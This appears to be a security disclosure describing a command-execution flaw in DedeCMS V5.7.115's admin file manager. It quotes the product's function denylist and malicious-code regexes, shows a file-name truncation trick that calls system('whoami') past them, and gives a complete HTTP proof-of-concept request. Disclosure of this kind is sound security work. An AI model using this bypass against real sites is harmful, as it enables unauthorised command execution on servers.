Command Execution Vulnerability in DedeCMS V5.7.115

[iami233]

Vulnerability Description

DedeCMS is a PHP website content management system developed. DedeCMS V5.7.115 has a command execution vulnerability, which attackers can exploit to execute malicious commands.

Vulnerability Impact

The official version of DedeCMS V5.7.115 (which is the latest version) can be downloaded from the official website: https://www.dedecms.com/download

Vulnerability Reproduction

After logging into the website backend, you can see the vulnerability point in the file manager under Modules -> Auxiliary Plugins in the left sidebar. Alternatively, you can directly access it via the following link:

http://<website_address>/dede/file_manage_view.php?fmdo=newfile&activepath=

When we change the file extension to .php, we can upload a custom PHP file. Through testing, we can see that certain functions are filtered, such as the following content:

<?php phpinfo(); ?>

The specific filter functions are located in the file dede/file_manage_control.php, lines 28-54:

$str = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $str);
global $cfg_disable_funs;
$cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfoevalassertexecpassthrushell_execsystemproc_openpopencurl_execcurl_multi_execparse_ini_fileshow_sourcefile_put_contentsfsockopenfopenfwritepreg_replace';
$cfg_disable_funs = $cfg_disable_funs.'[$]GLOBALS[$]_GET[$]_POST[$]_REQUEST[$]_FILES[$]_COOKIE[$]_SERVERincluderequirecreate_functionarray_mapcall_user_funccall_user_func_arrayarray_filertgetallheaders';
foreach (explode("", $cfg_disable_funs) as $value) {
    $value = str_replace(" ", "", $value);
    if (!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{']#i", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示：当前页面中存在恶意代码！<pre>{$str}</pre>");
    }
}
if (preg_match("#^[\s\S]+<\?(php|=)?[\s]+#i", "{$str}") == TRUE) {
    if (preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示：当前页面中存在恶意代码！<pre>{$str}</pre>");
    }
    if (preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示：当前页面中存在恶意代码！<pre>{$str}</pre>");
    }
    if (preg_match("#[`][\s\S]*[`]#i", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示：当前页面中存在恶意代码！<pre>{$str}</pre>");
    }
}

We can bypass the filters by truncating the file name. For example, if we want to use the system function to execute commands, we change the file name to system.php with the following content:

<?php substr(__FILE__, -10, 6)('whoami'); ?>

POC

POST /dede/file_manage_control.php HTTP/1.1
Host: dedecms.la
Content-Length: 190
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://dedecms.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://dedecms.la/dede/file_manage_view.php?fmdo=newfile&activepath=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=7atqchjja8g9a1b11sol8egogf; _csrf_name_5e980804=8af24700c5fdbad2259844278b86765f; _csrf_name_5e9808041BH21ANI1AGD297L1FF21LN02BGE1DNG=1a0f7176f0097d2d; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=6054ceafa2a9d5a2; DedeLoginTime=1723099351; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=8521e68d2dcc7cc9
Connection: close

fmdo=edit&backurl=&token=90990b401506a4b7a4cffb92ab66a740&activepath=&filename=system.php&str=%3C%3Fphp+substr%28__FILE__%2C+-10%2C+6%29%28%27whoami%27%29%3B+%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++